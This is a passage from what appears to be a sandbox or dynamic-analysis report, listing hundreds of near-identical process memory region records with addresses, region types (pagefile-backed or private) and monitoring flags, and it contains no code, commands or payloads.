end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9144 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9145 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9146 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9147 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9148 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9149 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9150 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9151 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9152 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9153 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9154 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9155 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9156 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9157 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9158 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9159 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9160 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9161 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9162 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9163 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9164 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9165 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9166 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9167 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9168 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9169 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9170 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9171 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9172 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9173 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9174 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9175 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9176 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9177 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9178 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9179 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9180 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9181 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9182 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9183 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9184 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9185 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9186 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9187 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9188 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9189 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9190 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9191 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9192 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9193 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9194 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9195 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9196 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9197 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 9198 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9199 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9200 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9201 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9202 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9203 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9204 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9205 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9206 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9207 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9208 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9209 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 9210 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9211 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9212 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9213 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9214 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 9215 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9216 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9217 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9218 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9219 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9220 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9221 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9222 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9223 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9224 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9225 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9226 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9227 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9228 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9229 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9230 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9231 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9232 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9233 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9234 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9235 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9236 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9237 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9238 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9239 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9240 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9241 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9242 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9243 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9244 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9245 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9246 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9247 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9248 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9249 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9250 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9251 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9252 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9253 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9254 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9255 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9256 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9257 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9258 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9259 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9260 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9261 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9262 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9263 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9264 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9265 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9266 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9267 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9268 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9269 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9270 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9271 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9272 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9273 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9274 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9275 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 9276 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9277 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9278 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9279 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9280 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9281 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9282 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9283 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9284 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9285 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9286 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9287 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9288 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9289 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9290 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9291 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9292 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9293 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9294 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9295 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9296 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9297 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9298 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9299 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9300 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9301 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9302 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9303 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9304 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9305 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9306 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9307 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9308 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9309 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9310 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9311 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9312 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9313 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9314 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9315 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9316 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9317 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9318 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9319 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9320 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9321 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9322 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 9323 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9324 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9325 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9326 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 9327 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9328 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9329 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9330 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" 